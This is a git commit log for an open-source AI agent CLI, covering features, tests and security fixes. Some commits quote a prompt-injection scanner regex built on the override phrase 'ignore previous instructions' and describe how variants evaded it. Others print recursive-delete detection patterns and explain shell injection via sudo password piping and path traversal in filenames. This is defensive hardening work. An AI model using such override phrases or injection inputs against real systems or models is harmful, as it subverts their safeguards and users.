feat(skills): add passive domain intelligence skill — subdomains, SSL, WHOIS, DNS, availability
2026-02-27 23:47:50 -08:00
teknium1
4d8689c10c feat: add honcho-ai package to dependencies and update extras in uv.lock 2026-02-27 23:45:52 -08:00
teknium1
1d7ce5e063 feat: integrate honcho-ai package and enhance tool progress callback in delegate_tool 2026-02-27 23:45:52 -08:00
Teknium
72d3425eef Merge pull request #94 from cesareth/feat/verbose-slash-command
feat(cli): add /verbose slash command to toggle debug output at runtime
2026-02-27 23:41:25 -08:00
teknium1
b7f099beed feat: add Honcho integration for cross-session user modeling 2026-02-27 23:41:08 -08:00
Teknium
912ef50165 Merge pull request #38 from plastic-labs/feat/honcho-integration
feat: Honcho memory integration (opt-in)
2026-02-27 23:35:29 -08:00
Teknium
4a9086b848 Merge branch 'main' into feat/honcho-integration 2026-02-27 23:32:49 -08:00
teknium1
50cb4d5fc7 fix(agent): update error message for unsupported Anthropic API endpoints to clarify usage of OpenRouter 2026-02-27 23:23:31 -08:00
Teknium
2bc9508b7c Merge pull request #173 from adavyas/fix/anthropic-base-url-guard
fix(agent): fail fast on Anthropic native base URLs
2026-02-27 23:22:01 -08:00
Teknium
337cd574c8 Merge pull request #167 from Jr-kenny/pr/docs-codefences
fix(docs): add missing code block language specifiers
2026-02-27 23:16:27 -08:00
Teknium
9fb027915e Merge pull request #166 from Jr-kenny/pr/docs-config
fix(docs): correct CLI config precedence and paths
2026-02-27 23:15:36 -08:00
Teknium
2b821c3a14 Merge pull request #162 from aydnOktay/fix/memory-tool-entry-delimiter-parsing
Fix memory tool entry parsing when content contains section sign
2026-02-27 23:13:15 -08:00
Teknium
0d113fab1a Merge pull request #158 from Indelwin/feature/docker-volumes
feat: add docker_volumes config for custom volume mounts
2026-02-27 23:06:06 -08:00
teknium1
19f28a633a fix(agent): enhance 413 error handling and improve conversation history management in tests 2026-02-27 23:04:32 -08:00
Teknium
2c817ce4a5 Merge pull request #153 from tekelala/main
fix(agent): handle 413 payload-too-large via compression instead of aborting
2026-02-27 22:57:55 -08:00
teknium1
66a5bc64db fix(process): use shlex to safely quote commands in bg_command for improved security 2026-02-27 22:50:26 -08:00
Teknium
7f423508e4 Merge pull request #151 from johnh4098/fix/shell-injection-spawn-via-env-v2
fix(process): escape single quotes in spawn_via_env bg_command
2026-02-27 22:49:04 -08:00
Teknium
306c6706a6 Merge pull request #150 from VencentSoliman/fix/gateway-model-personality-commands
fix(gateway): sync /model and /personality with CLI pattern
2026-02-27 22:48:03 -08:00
Teknium
64be67e062 Merge pull request #146 from alireza78a/fix/atomic-cron-job-save
fix(cron): use atomic write in save_jobs to prevent data loss
2026-02-27 22:16:43 -08:00
adavyas
0c0a2eb0a2 fix(agent): fail fast on Anthropic native base URLs 2026-02-27 21:19:29 -08:00
teknium1
de0829cec3 fix(cli): increase max iterations for child agents and extend API call timeout for improved reliability 2026-02-27 17:35:29 -08:00
Teknium
20177660bb Merge pull request #142 from Bartok9/docs/add-slash-commands-reference
docs: add slash commands reference
2026-02-27 17:33:19 -08:00
Jr-kenny
609fc6d080 fix(docs): add missing code block language specifiers 2026-02-28 02:04:38 +01:00
Jr-kenny
518826e70c fix(docs): standardize terminology and CLI formatting 2026-02-28 02:03:39 +01:00
Jr-kenny
13992a58da fix(docs): correct CLI config precedence and paths 2026-02-28 02:00:32 +01:00
Teknium
0d2ac1c07f Merge pull request #121 from Bartok9/test-clarify-tool
test(tools): add unit tests for clarify_tool.py
2026-02-27 16:27:37 -08:00
teknium1
fb7df099e0 feat(cli): add shell noise filtering and improve command execution with interactive login shell 2026-02-27 16:26:47 -08:00
teknium1
f14ff3e041 feat(cli): use user's login shell for command execution to ensure environment consistency 2026-02-27 15:10:27 -08:00
VencentSoliman
07fcb94bc0 fix(gateway): sync /model and /personality with CLI config.yaml pattern 2026-02-27 17:39:25 -05:00
aydnOktay
66d9983d46 Fix memory tool entry parsing when content contains section sign
- Use ENTRY_DELIMITER (\\n§\\n) instead of '§' when splitting entries in _read_file
- Prevents incorrect parsing when memory entries contain '§' character
- Aligns read logic with write logic for consistency
2026-02-28 01:33:41 +03:00
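The difference is easiest to see on a worked example; `ENTRY_DELIMITER` below matches the value quoted in the commit:

```python
ENTRY_DELIMITER = "\n§\n"  # the write path's full delimiter

raw = "First entry cites §5 of the spec.\n§\nSecond entry."

# Splitting on the bare character shreds the first entry:
assert len(raw.split("§")) == 3
# Splitting on the full delimiter keeps entries intact:
assert raw.split(ENTRY_DELIMITER) == [
    "First entry cites §5 of the spec.",
    "Second entry.",
]
```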
teknium1
4f3cb98e5e feat(cli): implement platform-specific toolset selection with improved user interface 2026-02-27 14:26:23 -08:00
teknium1
8c1f5efcab feat(cli): add toolset API key validation and improve checklist display 2026-02-27 13:56:43 -08:00
teknium1
c92bdd8785 fix(cli): improve spinner line clearing to prevent garbled output with prompt_toolkit 2026-02-27 13:49:06 -08:00
teknium1
e09ef6b8bc feat(gateway): improve model command handling by resolving current model from environment and config file 2026-02-27 13:42:07 -08:00
Gesina Sands
f7677ed275 feat: add docker_volumes config for custom volume mounts 2026-02-28 07:12:48 +10:00
johnh4098
e5f719a33b fix(process): escape single quotes in spawn_via_env bg_command 2026-02-27 21:03:17 +03:30
tekelala
79bd65034c fix(agent): handle 413 payload-too-large via compression instead of aborting
The 413 "Request Entity Too Large" error from the LLM API was caught by the
generic 4xx handler which aborts immediately. This is wrong for 413 — it's a
payload-size issue that can be resolved by compressing conversation history.

- Intercept 413 before the generic 4xx block and route to _compress_context
- Exclude 413 from generic is_client_error detection
- Add 'request entity too large' to context-length phrases as safety net
- Add tests for 413 compression behavior

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-27 12:21:27 -05:00
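A minimal sketch of the routing described above; the callables stand in for the agent's real compression and abort paths:

```python
def handle_api_error(status: int, compress_context, abort) -> None:
    if status == 413:
        # Payload too large: shrink conversation history and retry
        # instead of treating it as a fatal client error.
        compress_context()
        return
    # 413 is excluded from the generic client-error detection.
    if 400 <= status < 500 and status != 413:
        abort(f"client error {status}")
```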
tekelala
fbb1923fad fix(security): patch path traversal, size bypass, and prompt injection in document processing
- Sanitize filenames in cache_document_from_bytes to prevent path traversal (strip directory components, null bytes, resolve check)
- Reject documents with None file_size instead of silently allowing download
- Cap text file injection at 100 KB to prevent oversized prompt payloads
- Sanitize display_name in run.py context notes to block prompt injection via filenames
- Add 35 unit tests covering document cache utilities and Telegram document handling

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-27 11:53:46 -05:00
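A minimal sketch of the filename sanitization step, with a hypothetical cache directory standing in for the real document cache:

```python
import os
from pathlib import Path

CACHE_DIR = Path("/tmp/doc-cache")  # hypothetical location

def safe_cache_path(filename: str) -> Path:
    """Sanitize an untrusted filename before using it under CACHE_DIR."""
    # Strip null bytes and any directory components the sender supplied.
    name = os.path.basename(filename.replace("\x00", ""))
    if not name or name in {".", ".."}:
        raise ValueError("empty or invalid filename")
    target = (CACHE_DIR / name).resolve()
    # Resolve check: the final path must still sit inside the cache dir.
    if not target.is_relative_to(CACHE_DIR.resolve()):
        raise ValueError("path traversal attempt")
    return target
```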
alireza78a
bf75c450b7 fix(cron): use atomic write in save_jobs to prevent data loss 2026-02-27 20:16:49 +03:30
tekelala
b2172c4b2e feat(telegram): add document file processing for PDF, text, and Office files
Download, cache, and enrich document files sent via Telegram. Supports
.pdf, .md, .txt, .docx, .xlsx, .pptx with size validation, unsupported
type rejection, text content injection for .md/.txt, and hourly cache
cleanup.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-27 11:44:57 -05:00
Bartok Moltbot
69ccd76679 docs: add slash commands reference
Adds a comprehensive reference for all CLI slash commands including:
- Navigation & control commands
- Tools & configuration commands
- Conversation management
- Advanced features (cron, skills, platforms)
- Usage examples
- Tips for users

Makes it easier for new users to discover available commands.
2026-02-27 10:50:53 -05:00
teknium1
8b54bb4d89 docs: update CONTRIBUTING.md to enhance contribution guidelines and clarify priorities 2026-02-27 06:37:36 -08:00
kaos35
2595d81733 feat: Add Superpowers software development skills
Add 5 new skills for professional software development workflows,
adapted from the Superpowers project (obra/superpowers):

- test-driven-development: RED-GREEN-REFACTOR cycle enforcement
- systematic-debugging: 4-phase root cause investigation
- subagent-driven-development: Structured delegation with two-stage review
- writing-plans: Comprehensive implementation planning
- requesting-code-review: Systematic code review process

These skills provide structured development workflows that transform
Hermes from a general assistant into a professional software engineer
with defined processes for quality assurance.

Skills are organized under software-development category and follow
Hermes skill format with proper frontmatter, examples, and integration
guidance with existing skills.
2026-02-27 15:32:58 +01:00
FurkanL0
f9e05218ca Create SKILL.md 2026-02-27 17:07:13 +03:00
FurkanL0
2ddda5da89 Create DESCRIPTION.md 2026-02-27 17:06:17 +03:00
Teknium
dc80f0b222 Merge pull request #117 from Bartok9/docs/add-contributing-guide
docs: add CONTRIBUTING.md with contributor guidelines
2026-02-27 05:22:31 -08:00
teknium1
5007a122b2 fix(terminal): enhance error logging in cleanup functions with exception info 2026-02-27 03:53:58 -08:00
Teknium
43f2321225 Merge pull request #91 from 0xbyt4/fix/cli-spinner-flickering
fix(cli): reduce spinner flickering under patch_stdout
2026-02-27 03:48:32 -08:00
Teknium
1362f92f2e Merge pull request #89 from 0xbyt4/fix/cli-show-config-wrong-path
fix(cli): show correct config file path in /config command
2026-02-27 03:48:13 -08:00
teknium1
445d2646a9 Enhance arXiv integration: Add BibTeX generation, ID versioning, and withdrawn paper handling. Update search script to display version information alongside arXiv IDs. 2026-02-27 03:45:59 -08:00
Teknium
ae8d25faca Merge pull request #87 from 0xbyt4/fix/cli-max-turns-sentinel
fix(cli): respect explicit --max-turns value even when it equals default
2026-02-27 03:42:18 -08:00
Teknium
9061c03b6d Merge pull request #84 from 0xbyt4/fix/cli-paste-detection-false-positive
fix(cli): prevent paste detection from destroying multi-line input
2026-02-27 03:40:13 -08:00
Teknium
8174f5a988 Merge pull request #83 from 0xbyt4/fix/cli-save-config-string-model
fix(cli): prevent crash in save_config_value when model is a string
2026-02-27 03:36:39 -08:00
teknium1
03f7b551be Update README.md: Add DeepWiki Docs badge and enhance security description for sandboxing feature 2026-02-27 03:27:17 -08:00
Teknium
80ad6572a3 Merge pull request #75 from satelerd/fix/whatsapp-multi-user-sessions
fix(whatsapp): multi-user session isolation and bridge message handling
2026-02-27 03:25:54 -08:00
teknium1
c77f3da0ce Cherry-pick 6 bug fixes from PR #76 and update documentation
Code fixes (run_agent.py):
- Fix off-by-one in _flush_messages_to_session_db skipping one message per flush
- Add clear_interrupt() to 3 early-return paths preventing stale interrupt state
- Wrap handle_function_call in try/except so tool crashes don't kill the conversation
- Replace fragile `is` identity check with _flush_sentinel marker for memory flush cleanup
- Fix retry loop off-by-one (6 attempts not 7)
- Remove redundant inline `import re`
2026-02-27 03:21:49 -08:00
teknium1
c104647450 Documentation (README.md):
- Add "Security Hardening" section with table of protections from recent PRs
- Add "Reasoning Effort" config section under Features
- Add Slack and WhatsApp env vars to Environment Variables Reference
- Remove non-functional ANTHROPIC_API_KEY from env vars table
- Add `hermes whatsapp` to Commands section

Documentation (docs/messaging.md):
- Rewrite WhatsApp section to reflect Baileys bridge and `hermes whatsapp` flow
- Add Slack env vars, adapter to architecture diagram, and platform toolsets table
2026-02-27 03:21:42 -08:00
Teknium
547ba73b82 Merge pull request #65 from leonsgithub/fix/sudo-password-shell-injection
fix(security): prevent shell injection in sudo password piping
2026-02-27 01:50:07 -08:00
Teknium
3526fa27fd Merge pull request #62 from 0xbyt4/test/expand-coverage-2
test: add unit tests for 8 modules (batch 2)
2026-02-27 01:47:30 -08:00
Teknium
9eabdb64ff Merge pull request #72 from cutepawss/fix/install-script-silent-abort
fix: prevent silent abort in piped install when interactive prompts fail (#69)
2026-02-27 01:45:06 -08:00
Teknium
6f543eac9f Merge branch 'main' into fix/install-script-silent-abort 2026-02-27 01:44:59 -08:00
Teknium
64eca85876 Merge pull request #67 from 0xbyt4/test/add-run-agent-unit-tests
test: add unit tests for run_agent.py (AIAgent)
2026-02-27 01:36:49 -08:00
Teknium
152271851f Merge pull request #63 from 0xbyt4/fix/cron-prompt-injection-bypass
fix: cron prompt injection scanner bypass for multi-word variants
2026-02-27 01:34:14 -08:00
Teknium
0909be3aa8 Merge pull request #61 from 0xbyt4/fix/write-deny-macos-symlink
fix: resolve symlink bypass in write deny list on macOS
2026-02-27 01:32:19 -08:00
Teknium
274e623b50 Merge pull request #60 from 0xbyt4/test/expand-coverage
test: add unit tests for 8 untested core modules
2026-02-27 01:30:36 -08:00
Teknium
2972f982e4 Merge pull request #55 from bierlingm/fix/atexit-signal-handler-race
Fix SystemExit traceback during atexit cleanup on Ctrl+C
2026-02-27 00:42:23 -08:00
Bartok Moltbot
df8a62d018 test(tools): add unit tests for clarify_tool.py
Add comprehensive test coverage for the clarify_tool module:

- TestClarifyToolBasics: 5 tests for core functionality
  - Simple questions, questions with choices, error handling

- TestClarifyToolChoicesValidation: 5 tests for choices parameter
  - MAX_CHOICES enforcement, empty/whitespace handling, type conversion

- TestClarifyToolCallbackHandling: 3 tests for callback behavior
  - Exception handling, question/response trimming

- TestCheckClarifyRequirements: 1 test verifying always-true behavior

- TestClarifySchema: 6 tests verifying OpenAI function schema
  - Required/optional parameters, maxItems constraint

Total: 20 tests covering all public functions and edge cases.
2026-02-27 03:29:26 -05:00
teknium1
fec5d59fb3 feat(gateway): integrate pairing store and event hook system
This update introduces a pairing store for code-based user authorization and an event hook system within the GatewayRunner class. These enhancements aim to improve user authorization processes and facilitate event-driven functionalities in the gateway.
2026-02-27 00:23:26 -08:00
Bartok9
7285e44064 docs: add CONTRIBUTING.md with contributor guidelines
Add comprehensive contributor guide covering:
- Development setup
- Project structure overview
- Code style guidelines
- How to add new tools
- How to add new skills
- Pull request process
- Commit message conventions
- Security considerations
2026-02-27 03:23:04 -05:00
teknium1
2ff54ae6b3 fix(gateway): Remove session_db from AIAgent instantiation to prevent errors
This change removes the session_db parameter from AIAgent instantiations in gateway/run.py, addressing issues related to session management. The previous implementation caused errors when session_db was not properly initialized, leading to failures in session_search functionality.
2026-02-27 00:13:47 -08:00
Teknium
f74ac0fc3a Merge pull request #108 from Bartok9/fix-session-db-gateway
fix(gateway): Pass session_db to AIAgent, fixing session_search error
2026-02-27 00:11:18 -08:00
teknium1
26a6da27fa feat(research): add arXiv search skill and documentation
- Introduced a new skill for searching and retrieving academic papers from arXiv using their REST API, allowing searches by keyword, author, category, or ID.
- Added a helper script for clean output of search results, including options for sorting and filtering.
- Created a DESCRIPTION.md file outlining the purpose and functionality of the research skills.
2026-02-27 00:05:06 -08:00
teknium1
19abbfff96 feat(ocr-and-documents): add OCR and document extraction skills
- Introduced new skills for extracting text from PDFs, scanned documents, and images using OCR and document parsing tools.
- Added detailed documentation for usage and installation of `pymupdf` and `marker-pdf` for local extraction.
- Implemented scripts for text extraction with both lightweight and high-quality options, including support for various document formats.
- Updated web extraction functionality to handle PDF URLs directly, enhancing usability for academic papers and documents.
2026-02-26 23:06:08 -08:00
Bartok Moltbot
8aa531c7fa fix(gateway): Pass session_db to AIAgent, fixing session_search error
When running via the gateway (e.g. Telegram), the session_search tool
returned: {"error": "session_search must be handled by the agent loop"}

Root cause:
- gateway/run.py creates AIAgent without passing session_db=
- self._session_db is None in the agent instance
- The dispatch condition "elif function_name == 'session_search' and self._session_db"
  skips when _session_db is None, falling through to the generic error

This fix:
1. Initializes self._session_db in GatewayRunner.__init__()
2. Passes session_db to all AIAgent instantiations in gateway/run.py
3. Adds defensive fallback in run_agent.py to return a clear error when
   session_db is unavailable, instead of falling through

Fixes #105
2026-02-27 00:32:17 -05:00
Teknium
21cf339a85 Merge pull request #59 from deankerr/fix/ssh-terminal-check
fix: add SSH backend to terminal requirements check
2026-02-26 21:22:47 -08:00
teknium1
588cdacd49 feat(session): implement session reset policy for messaging platforms
- Added configuration options for automatic session resets based on inactivity or daily boundaries in cli-config.yaml.
- Enhanced SessionResetPolicy class to support a "none" mode for no auto-resets.
- Implemented memory flushing before session resets in SessionStore to preserve important information.
- Updated setup wizard to guide users in configuring session reset preferences.
2026-02-26 21:20:50 -08:00
teknium1
0cce536fb2 fix: file operations on macOS
Co-authored-by: Dean Kerr <dean.kerr@gmail.com>
2026-02-26 21:20:25 -08:00
teknium1
b281ecd50a Fix: rendering issue in /skills command 2026-02-26 20:29:52 -08:00
teknium1
b267e34092 feat(cli): add auto-restart functionality for hermes-gateway service when updating
- Implemented a check to determine if the hermes-gateway service is active after an update.
- Added logic to automatically restart the service if it is running, ensuring changes are applied without manual intervention.
- Updated user guidance to reflect the new auto-restart feature, removing the need for manual restart instructions.
2026-02-26 20:26:05 -08:00
teknium1
58fce0a37b feat(api): implement dynamic max tokens handling for various providers
- Added _max_tokens_param method in AIAgent to return appropriate max tokens parameter based on the provider (OpenAI vs. others).
- Updated API calls in AIAgent to utilize the new max tokens handling.
- Introduced auxiliary_max_tokens_param function in auxiliary_client for consistent max tokens management across auxiliary clients.
- Refactored multiple tools to use auxiliary_max_tokens_param for improved compatibility with different models and providers.
2026-02-26 20:23:56 -08:00
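A minimal sketch of the provider branching, under the assumption that OpenAI's newer chat models expect `max_completion_tokens` while most OpenAI-compatible providers still take `max_tokens`:

```python
def max_tokens_param(base_url: str) -> str:
    """Pick the token-limit parameter name for the target provider."""
    if "api.openai.com" in base_url:
        return "max_completion_tokens"  # newer OpenAI chat models
    return "max_tokens"                 # most OpenAI-compatible APIs

# Usage: splat into the chat-completions call.
kwargs = {max_tokens_param("https://api.openai.com/v1"): 4096}
```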
teknium1
f0458ebdb8 feat(config): enhance terminal environment variable management
- Updated .env.example to clarify terminal backend configuration and its relationship with config.yaml.
- Modified gateway/run.py to ensure terminal settings from config.yaml take precedence over .env, improving consistency in environment variable handling.
- Added mapping for terminal configuration options to corresponding environment variables for better integration.
2026-02-26 20:05:35 -08:00
teknium1
0a231c0783 feat(config): synchronize terminal settings with environment variables
- Added functionality to keep the .env file in sync with terminal configuration settings in config.yaml, ensuring terminal_tool can directly access necessary environment variables.
- Updated setup wizard to save selected backend and associated Docker image to .env for improved consistency and usability.
2026-02-26 20:02:46 -08:00
teknium1
7c1f90045e docs: update README and tools configuration for improved toolset management
- Updated README to reflect the new command for configuring tools per platform.
- Modified tools_config.py to correct the handling of preselected entries in the toolset checklist, ensuring proper functionality during user interaction.
2026-02-26 19:59:24 -08:00
teknium1
a5ea272936 refactor: streamline API key retrieval in transcription and TTS tools
- Removed fallback to OPENAI_API_KEY in favor of exclusively using VOICE_TOOLS_OPENAI_KEY for improved clarity and consistency.
- Updated environment variable checks to ensure only VOICE_TOOLS_OPENAI_KEY is considered, enhancing error handling and messaging.
2026-02-26 19:56:42 -08:00
teknium1
715825eac3 fix(cli): enhance provider configuration check for environment variables
- Updated the logic in _has_any_provider_configured to include OPENAI_BASE_URL as a valid provider variable, allowing local models to be recognized without an API key.
- Consolidated environment variable checks into a single tuple for better maintainability.
2026-02-26 19:56:24 -08:00
cesareth
1a97e82000 feat(cli): add /verbose slash command to toggle debug output at runtime
Closes #77. Users can now type /verbose in the CLI to toggle verbose
mode on or off without restarting. When enabled, full tool call
parameters, results, and debug logs are shown. The agent's
verbose_logging and quiet_mode flags are updated live, and Python
logging levels are reconfigured accordingly.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-02-26 23:18:45 +00:00
Erosika
70d1abf81b refactor: run Honcho and USER.md in tandem
USER.md stays in system prompt when Honcho is active -- prefetch is
additive context, not a replacement. Memory tool user observations
write to both USER.md (local) and Honcho (cross-session) simultaneously.
2026-02-26 18:07:33 -05:00
Erosika
1fd0fcddb2 feat: integrate Honcho with USER.md memory system
When Honcho is active:
- System prompt uses Honcho prefetch instead of USER.md
- memory tool target=user add routes to Honcho
- MEMORY.md untouched in all cases

When disabled, everything works as before.

Also wires up contextTokens config to cap prefetch size.
2026-02-26 18:07:17 -05:00
Erosika
ab4bbf2fb2 feat: add Honcho AI-native memory integration
Opt-in persistent cross-session user modeling via Honcho. Reads
~/.honcho/config.json as single source of truth (shared with
Claude Code, Cursor, and other Honcho-enabled tools). Zero impact
when disabled or unconfigured.

- honcho_integration/ package (client, session manager, peer resolution)
- Host-based config resolution matching claude-honcho/cursor-honcho pattern
- Prefetch user context into system prompt per conversation turn
- Sync user/assistant messages to Honcho after each exchange
- query_user_context tool for mid-conversation dialectic reasoning
- Gated activation: requires ~/.honcho/config.json with enabled=true
2026-02-26 18:07:17 -05:00
teknium1
669e4d0297 add experimental google workspace command center skill 2026-02-26 14:29:51 -08:00
0xbyt4
f92875bc3e fix(cli): reduce spinner flickering under patch_stdout
KawaiiSpinner used a two-phase clear+redraw approach: first write
\r + spaces to blank the line, then \r + new frame. When running
inside prompt_toolkit's patch_stdout proxy, each phase could trigger
a separate repaint, causing visible flickering every 120ms.

Replace with a single \r\033[K (carriage return + ANSI erase-to-EOL)
write so the line is cleared and redrawn atomically.
2026-02-26 23:55:07 +03:00
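A minimal sketch of the atomic redraw; frames and text are illustrative:

```python
import sys
import time

FRAMES = "|/-\\"

def spin(seconds: float = 2.0) -> None:
    start = time.time()
    i = 0
    while time.time() - start < seconds:
        # One write: carriage return + ANSI erase-to-end-of-line + frame.
        # No separate blank-out pass, so nothing flickers under a proxy.
        sys.stdout.write(f"\r\033[K{FRAMES[i % len(FRAMES)]} working...")
        sys.stdout.flush()
        time.sleep(0.12)
        i += 1
    sys.stdout.write("\r\033[Kdone\n")
```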
0xbyt4
7f36259f88 fix(cli): show correct config file path in /config command
show_config() always checked cli-config.yaml in the project directory,
but load_cli_config() first looks at ~/.hermes/config.yaml. When the
user config existed, /config would display "cli-config.yaml (not found)"
even though configuration was loaded successfully from ~/.hermes/.

Use the same lookup order as load_cli_config and display the actual
resolved path.
2026-02-26 23:49:08 +03:00
0xbyt4
2c28d9f560 fix(cli): respect explicit --max-turns value even when it equals default
max_turns used 60 as both the default and the sentinel to detect
whether the user passed the flag. This meant `--max-turns 60` was
indistinguishable from "not passed", so the env var
HERMES_MAX_ITERATIONS would silently override the explicit CLI value.

Change the default to None so any user-supplied value takes priority.
2026-02-26 23:43:38 +03:00
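A minimal sketch of the sentinel change with argparse; the env-var fallback mirrors the priority described above:

```python
import argparse
import os

parser = argparse.ArgumentParser()
# Default None (not 60) makes "flag omitted" distinguishable from an
# explicit `--max-turns 60`.
parser.add_argument("--max-turns", type=int, default=None)
args = parser.parse_args()

if args.max_turns is not None:
    max_turns = args.max_turns  # explicit CLI value always wins
else:
    max_turns = int(os.environ.get("HERMES_MAX_ITERATIONS", 60))
```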
0xbyt4
c21b071e77 fix(cli): prevent paste detection from destroying multi-line input
The _on_text_changed handler collapsed buffer contents into a file
reference whenever the buffer had 5+ newlines, regardless of how
those lines were entered. This meant manually typing with Alt+Enter
would trigger the paste heuristic and silently replace the user's
carefully typed input.

Track the previous buffer length and only treat a change as a paste
when more than one character is added at once (real pastes insert many
characters in a single event, while typing adds one at a time).
2026-02-26 23:40:38 +03:00
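A minimal sketch of the heuristic, detached from prompt_toolkit; the five-newline threshold comes from the commit text:

```python
class PasteDetector:
    """A paste inserts many characters in one buffer event; typing
    (including Alt+Enter newlines) adds one character at a time."""

    def __init__(self) -> None:
        self._prev_len = 0

    def looks_like_paste(self, text: str) -> bool:
        added = len(text) - self._prev_len
        self._prev_len = len(text)
        return added > 1 and text.count("\n") >= 5
```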
0xbyt4
de197bd7cb fix(cli): prevent crash in save_config_value when model is a string
load_cli_config() supports both string and dict formats for the model
key (e.g. `model: "anthropic/claude-opus-4"`), but save_config_value()
assumed all intermediate keys are dicts. When the config file used the
string format, running `/model <name>` would crash with TypeError:
'str' object does not support item assignment.

Add an isinstance check so non-dict values are replaced with a fresh
dict before descending.
2026-02-26 23:35:00 +03:00
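A minimal sketch of the guard; the dotted-key walker is hypothetical but shows the isinstance check in context:

```python
def save_config_value(config: dict, dotted_key: str, value) -> None:
    node = config
    keys = dotted_key.split(".")
    for key in keys[:-1]:
        # Replace non-dict intermediates (e.g. model: "anthropic/...")
        # with a fresh dict instead of raising TypeError.
        if not isinstance(node.get(key), dict):
            node[key] = {}
        node = node[key]
    node[keys[-1]] = value

cfg = {"model": "anthropic/claude-opus-4"}  # string form from the report
save_config_value(cfg, "model.default", "my-model")
assert cfg == {"model": {"default": "my-model"}}
```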
teknium1
bf9dd83c10 fix(cli): improve description extraction for toolsets
- Updated the description extraction logic to split on ". " (period+space) to avoid breaking on abbreviations like "e.g." or version numbers.
- Changed the method to prioritize the first line of the description, ensuring more relevant information is captured for display.
2026-02-26 12:11:32 -08:00
teknium1
760fb2ca0e feat(install): enhance installation script for build tools and interactive prompts
- Updated the installation script to check for necessary build tools on Debian/Ubuntu systems and prompt the user to install them if missing.
- Improved user interaction by redirecting input from /dev/tty for prompts, ensuring compatibility when the script is piped from curl.
- Added checks to verify the successful installation of the main package and provide guidance if installation fails.
- Enhanced the handling of shell configuration files to ensure ~/.local/bin is added to PATH for various shell types.
2026-02-26 11:37:40 -08:00
Teknium
a8ccaca8ea Merge pull request #68 from cutepawss/fix/dangerous-cmd-regex-false-positive
fix: prevent false positives in recursive delete detection
2026-02-26 11:32:06 -08:00
George Pickett
32070e6bc0 Merge remote-tracking branch 'origin/main' into codex/align-codex-provider-conventions-mainrepo
# Conflicts:
#	cron/scheduler.py
#	gateway/run.py
#	tools/delegate_tool.py
2026-02-26 10:56:29 -08:00
Daniel Sateler
f02f647237 fix(whatsapp): per-contact DM session isolation and user identity in context 2026-02-26 12:44:09 -03:00
Daniel Sateler
96043a8f7e fix(whatsapp): skip agent's own replies in bridge message handler 2026-02-26 12:43:24 -03:00
darya
0bb8d8faf5 fix: prevent silent abort in piped install when interactive prompts fail (#69)
Root cause: the install script uses `set -e` (exit on error) and `read -p`
for interactive prompts. When running via `curl | bash`, stdin is a pipe
(not a terminal), so `read -p` hits EOF and returns exit code 1. Under
`set -e`, this silently aborts the entire script before hermes is installed.

Fix: detect non-interactive mode using `[ -t 0 ]` (standard POSIX test for
terminal stdin) and skip all interactive prompts when running in piped mode.
Clear messages are shown instead, telling the user what to run manually.

Changes:
- Add IS_INTERACTIVE flag at script start ([ -t 0 ] check)
- Guard sudo package install prompt (the direct cause of #69)
- Guard setup wizard (calls interactive hermes setup)
- Guard WhatsApp pairing and gateway install prompts

All other prompts use the same read -p pattern and would fail the same way
in piped mode, so they are all guarded for completeness.

Closes #69
2026-02-26 17:45:50 +03:00
darya
f5c09a3aba test: add regression tests for recursive delete false positive fix
Add 15 new tests in two classes:

- TestRmFalsePositiveFix (8 tests): verify filenames starting with 'r'
  (readme.txt, requirements.txt, report.csv, etc.) are NOT falsely
  flagged as 'recursive delete'

- TestRmRecursiveFlagVariants (7 tests): verify all recursive delete
  flag styles (-r, -rf, -rfv, -fr, -irf, --recursive, sudo rm -rf)
  are still correctly caught

All 29 tests pass (14 existing + 15 new).
2026-02-26 16:40:44 +03:00
darya
3227cc65d1 fix: prevent false positives in recursive delete detection
The regex pattern for detecting recursive delete commands (rm -r, rm -rf,
etc.) incorrectly matched filenames starting with 'r' — e.g., 'rm readme.txt'
was flagged as 'recursive delete' because the dash-flag group was optional.

Fix: make the dash mandatory so only actual flags (-r, -rf, -rfv, -fr)
are matched. This eliminates false approval prompts for innocent commands
like 'rm readme.txt', 'rm requirements.txt', 'rm report.csv', etc.

Before: \brm\s+(-[^\s]*)?r  — matches 'rm readme.txt' (false positive)
After:  \brm\s+-[^\s]*r     — requires '-' prefix, no false positives
2026-02-26 16:32:01 +03:00
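The before/after patterns from the commit, made executable:

```python
import re

OLD = re.compile(r"\brm\s+(-[^\s]*)?r")  # optional dash group: buggy
NEW = re.compile(r"\brm\s+-[^\s]*r")     # mandatory dash: fixed

assert OLD.search("rm readme.txt")            # false positive
assert NEW.search("rm readme.txt") is None    # innocent file untouched
assert NEW.search("rm -rf /tmp/x")            # recursive delete caught
assert NEW.search("sudo rm -fr build/")       # flag order still matches
```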
0xbyt4
90ca2ae16b test: add unit tests for run_agent.py (AIAgent)
71 tests covering pure functions, state/structure methods, and
conversation loop pieces. OpenAI client and tool loading are mocked.
2026-02-26 16:15:04 +03:00
Leon
25e260bb3a fix(security): prevent shell injection in sudo password piping
The sudo password was embedded in shell commands via single-quote
interpolation: echo '{password}' | sudo -S

If the password contained shell metacharacters (single quotes,
$(), backticks), they would be interpreted by the shell, enabling
arbitrary command execution.

Fix: use shlex.quote() which properly escapes all shell-special
characters, ensuring the password is always treated as a literal
string argument to echo.
2026-02-26 19:04:32 +07:00
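A minimal sketch of the fix with a hostile example password:

```python
import shlex

password = "hunter2'; rm -rf ~; echo '"  # attacker-controlled input

# Unsafe: the quotes in the password terminate the literal and the
# shell executes whatever follows.
unsafe = f"echo '{password}' | sudo -S true"

# Safe: shlex.quote() escapes every shell-special character, so echo
# receives the password as a single literal argument.
safe = f"echo {shlex.quote(password)} | sudo -S true"
```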
0xbyt4
feea8332d6 fix: cron prompt injection scanner bypass for multi-word variants
The regex `ignore\s+(previous|all|above|prior)\s+instructions` only
allowed ONE word between "ignore" and "instructions". Multi-word
variants like "Ignore ALL prior instructions" bypassed the scanner
because "ALL" matched the alternation but then `\s+instructions`
failed to match "prior".

Fix: use `(?:\w+\s+)*` groups to allow optional extra words before
and after the keyword alternation.
2026-02-26 13:55:54 +03:00
0xbyt4
ffbdd7fcce test: add unit tests for 8 modules (batch 2)
Cover model_tools, toolset_distributions, context_compressor,
prompt_caching, cronjob_tools, session_search, process_registry,
and cron/scheduler with 127 new test cases.
2026-02-26 13:54:20 +03:00
0xbyt4
b699cf8c48 test: remove /etc platform-conditional tests from file_operations
These tests documented the macOS symlink bypass bug with
platform-conditional assertions. The fix and proper regression
